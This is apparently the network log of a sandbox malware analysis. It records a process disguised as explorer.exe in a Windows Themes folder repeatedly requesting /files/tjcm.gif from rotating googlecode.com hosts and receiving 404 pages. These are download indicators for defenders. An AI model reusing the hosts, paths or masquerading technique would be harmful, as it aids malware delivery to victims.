                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.651173108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:52.284068108 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:52.991488934 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:52 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:52.991512060 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.651174142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:53.771833897 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:54.681067944 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:54 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:54.681083918 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.651175172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:55.492539883 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:56.018510103 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:55 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:56.018582106 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.651176108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:56.868261099 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:57.553823948 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:57 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:57.555399895 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.651177142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:58.269563913 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:58.992912054 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:58 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:58.992928028 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:08:59.246459007 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:08:59.254582882 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:58 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.651179172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:59.843415976 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:00.409792900 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:00 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:00.409811974 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.651180108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:01.689575911 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:02.390383005 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:02 GMT
